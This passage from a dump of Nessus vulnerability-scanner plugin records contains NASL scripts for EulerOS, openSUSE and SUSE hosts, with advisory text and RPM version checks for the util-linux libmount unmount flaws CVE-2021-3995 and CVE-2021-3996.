found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. 
(CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1461\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42c1b145\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) 
audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.1-1.h24.eulerosv2r9\",\n \"libfdisk-2.35.1-1.h24.eulerosv2r9\",\n \"libmount-2.35.1-1.h24.eulerosv2r9\",\n \"libsmartcols-2.35.1-1.h24.eulerosv2r9\",\n \"libuuid-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-user-2.35.1-1.h24.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:26:44", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2022:0727-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. 
An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-05T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : libeconf, shadow and util-linux (openSUSE-SU-2022:0727-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libblkid-devel", "p-cpe:/a:novell:opensuse:libblkid-devel-32bit", "p-cpe:/a:novell:opensuse:libblkid-devel-static", "p-cpe:/a:novell:opensuse:libblkid1", "p-cpe:/a:novell:opensuse:libblkid1-32bit", "p-cpe:/a:novell:opensuse:libeconf-devel", "p-cpe:/a:novell:opensuse:libeconf0", "p-cpe:/a:novell:opensuse:libeconf0-32bit", "p-cpe:/a:novell:opensuse:libfdisk-devel", "p-cpe:/a:novell:opensuse:libfdisk-devel-32bit", "p-cpe:/a:novell:opensuse:libfdisk-devel-static", "p-cpe:/a:novell:opensuse:libfdisk1", "p-cpe:/a:novell:opensuse:libfdisk1-32bit", "p-cpe:/a:novell:opensuse:libmount-devel", "p-cpe:/a:novell:opensuse:libmount-devel-32bit", "p-cpe:/a:novell:opensuse:libmount-devel-static", "p-cpe:/a:novell:opensuse:libmount1", "p-cpe:/a:novell:opensuse:libmount1-32bit", "p-cpe:/a:novell:opensuse:libsmartcols-devel", "p-cpe:/a:novell:opensuse:libsmartcols-devel-32bit", "p-cpe:/a:novell:opensuse:libsmartcols-devel-static", "p-cpe:/a:novell:opensuse:libsmartcols1", "p-cpe:/a:novell:opensuse:libsmartcols1-32bit", "p-cpe:/a:novell:opensuse:libuuid-devel", "p-cpe:/a:novell:opensuse:libuuid-devel-32bit", "p-cpe:/a:novell:opensuse:libuuid-devel-static", "p-cpe:/a:novell:opensuse:libuuid1", "p-cpe:/a:novell:opensuse:libuuid1-32bit", "p-cpe:/a:novell:opensuse:login_defs", "p-cpe:/a:novell:opensuse:python3-libmount", "p-cpe:/a:novell:opensuse:shadow", "p-cpe:/a:novell:opensuse:util-linux", 
"p-cpe:/a:novell:opensuse:util-linux-lang", "p-cpe:/a:novell:opensuse:util-linux-systemd", "p-cpe:/a:novell:opensuse:uuidd", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2022-0727-1.NASL", "href": "https://www.tenable.com/plugins/nessus/158640", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:0727-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158640);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"openSUSE 15 Security Update : libeconf, shadow and util-linux (openSUSE-SU-2022:0727-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2022:0727-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. 
This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1188507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1192954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1194976\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/GUBUSLRBG42MLRL65HHMLIWQIKS3SKKP/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?630d9106\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3995\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3996\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/04\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libblkid1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libeconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libeconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libeconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libfdisk1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmount1-32bit\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmartcols-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmartcols-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmartcols1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmartcols1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libuuid1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:login_defs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:shadow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:util-linux-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:util-linux-systemd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libeconf-devel-0.4.4+git20220104.962774f-150300.3.6.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libeconf0-32bit-0.4.4+git20220104.962774f-150300.3.6.2', 
'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.36.2-150300.4.14.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.36.2-150300.4.14.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libblkid-devel / libblkid-devel-32bit / 
libblkid-devel-static / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-14T14:59:08", "description": "The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:0727-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. 
(CVE-2021-3996)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-05T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : libeconf, shadow and util-linux (SUSE-SU-2022:0727-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-07-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libblkid-devel", "p-cpe:/a:novell:suse_linux:libblkid-devel-static", "p-cpe:/a:novell:suse_linux:libblkid1", "p-cpe:/a:novell:suse_linux:libblkid1-32bit", "p-cpe:/a:novell:suse_linux:libeconf0", "p-cpe:/a:novell:suse_linux:libfdisk-devel", "p-cpe:/a:novell:suse_linux:libfdisk1", "p-cpe:/a:novell:suse_linux:libmount-devel", "p-cpe:/a:novell:suse_linux:libmount1", "p-cpe:/a:novell:suse_linux:libmount1-32bit", "p-cpe:/a:novell:suse_linux:libsmartcols-devel", "p-cpe:/a:novell:suse_linux:libsmartcols1", "p-cpe:/a:novell:suse_linux:libuuid-devel", "p-cpe:/a:novell:suse_linux:libuuid-devel-static", "p-cpe:/a:novell:suse_linux:libuuid1", "p-cpe:/a:novell:suse_linux:libuuid1-32bit", "p-cpe:/a:novell:suse_linux:login_defs", "p-cpe:/a:novell:suse_linux:shadow", "p-cpe:/a:novell:suse_linux:util-linux", "p-cpe:/a:novell:suse_linux:util-linux-lang", "p-cpe:/a:novell:suse_linux:util-linux-systemd", "p-cpe:/a:novell:suse_linux:uuidd", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2022-0727-1.NASL", "href": "https://www.tenable.com/plugins/nessus/158608", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:0727-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158608);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/14\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:0727-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : libeconf, shadow and util-linux (SUSE-SU-2022:0727-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 host has packages installed that are affected by\nmultiple vulnerabilities as referenced in the SUSE-SU-2022:0727-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. 
(CVE-2021-3996)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1188507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1192954\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1194976\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3995\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3996\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-March/010364.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16caa759\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", 
